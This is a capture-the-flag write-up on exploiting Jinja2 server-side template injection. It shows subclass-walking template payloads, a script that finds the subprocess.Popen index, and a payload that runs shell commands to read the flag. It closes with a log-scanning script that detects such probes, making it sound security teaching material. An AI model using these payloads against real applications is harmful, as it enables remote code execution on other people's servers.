Super Secure Technology Infrastructure

Description

Super secure technology infrastructure,
A fortress built with digital flair,
Encrypted and protected, no intrusion allowed,
Our data safe from any dare.

Poem by ChatGPT

The initials of the challenge title spell SSTI, which hints that this is a Server-Side Template Injection vulnerability.

Server-side template injection (SSTI) is a vulnerability that occurs when a web application builds a template from user input and then renders that template on the server. If the input is not properly sanitized, an attacker can inject template syntax, which the template engine evaluates on the server when the template is rendered.

First, we need to identify the templating engine in use; the chart below helps narrow it down.

After playing with the input, we can identify that it is running Jinja2. We can also refer to the HackTricks guide to identify the templating engine.

Referring to the Jinja2 SSTI guide, we are able to perform remote code execution and get the flag!

First, we need to find the index of <class 'subprocess.Popen'> in the list of subclasses. We can find it using the payload below, which lists all the subclasses of object:

{{''.__class__.__mro__[1].__subclasses__()}}

A handy script to find the index from the dumped list:

data = """[<class 'type'>, <class 'weakref'>, <class 'weakcallableproxy'>, <class 'weakproxy'>, <class 'int'>, <class 'bytearray'>, <class 'bytes'>, <class 'list'>, <class 'NoneType'>, <class 'NotImplemented>..."""
data = data.split(', ')

id = []
for i,d in enumerate(data):
    if 'subprocess' in d:
        print("Found in index:",i)
        id.append(i)

for i in id:
        print(f"{{{{ ''.__class__.__mro__[1].__subclasses__()[{i}]('ls',shell=True,stdout=-1).communicate() }}}}")

After finding the index of <class 'subprocess.Popen'> (397 on this target; the index depends on the Python build and loaded modules, so it must be determined per environment), we can use it to perform RCE.

{{''.__class__.__mro__[1].__subclasses__()[397]('cat flag.txt',shell=True,stdout=-1).communicate()}}
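From the defender's side, the probe and class-walking payloads used above leave a recognizable trace in web access logs. The script below is an added detection example, not part of the original writeup: it decodes each request target from constructed sample log lines and flags Jinja2 delimiters, arithmetic fingerprinting probes, and dunder attribute walking (the log format, IPs and paths are assumptions).

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not taken from the challenge).
# Line 2 is an engine-fingerprinting probe, line 3 is the class-walking
# payload from the writeup; note the large response size on line 3, which
# is the dumped __subclasses__() list being returned to the client.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2023:10:01:02 +0000] "GET /greet?name=alice HTTP/1.1" 200 512
10.0.0.5 - - [12/Mar/2023:10:01:09 +0000] "GET /greet?name=%7B%7B7*7%7D%7D HTTP/1.1" 200 498
10.0.0.5 - - [12/Mar/2023:10:01:31 +0000] "GET /greet?name=%7B%7B%27%27.__class__.__mro__%5B1%5D.__subclasses__%28%29%7D%7D HTTP/1.1" 200 91022
10.0.0.9 - - [12/Mar/2023:10:02:00 +0000] "GET /static/app.js HTTP/1.1" 304 0
"""

REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')
# Jinja2 expression or statement delimiters anywhere in the decoded target
DELIMITERS = re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.S)
# Arithmetic probe such as {{7*7}} used to fingerprint the engine
PROBE = re.compile(r"\{\{\s*\d+\s*[*+]\s*\d+\s*\}\}")
# Dunder attribute walking used to reach arbitrary classes from a string
DUNDER = re.compile(r"__(class|mro|subclasses|globals|builtins|import)__")

def classify_target(target):
    """Return 'escape', 'probe', 'template_syntax' or None for one request target."""
    decoded = unquote_plus(target)
    if not DELIMITERS.search(decoded):
        return None
    if DUNDER.search(decoded):
        return "escape"
    if PROBE.search(decoded):
        return "probe"
    return "template_syntax"

def scan_log(text):
    """Return (line_no, client_ip, verdict, decoded_target) for each flagged line."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), 1):
        match = REQUEST.search(line)
        if not match:
            continue
        verdict = classify_target(match.group("target"))
        if verdict:
            hits.append((line_no, line.split()[0], verdict,
                         unquote_plus(match.group("target"))))
    return hits

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The same patterns can be applied to request bodies or a WAF rule; a 'probe' followed by an 'escape' from the same client is the sequence this writeup walks through.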

References

https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server Side Template Injection#jinja2
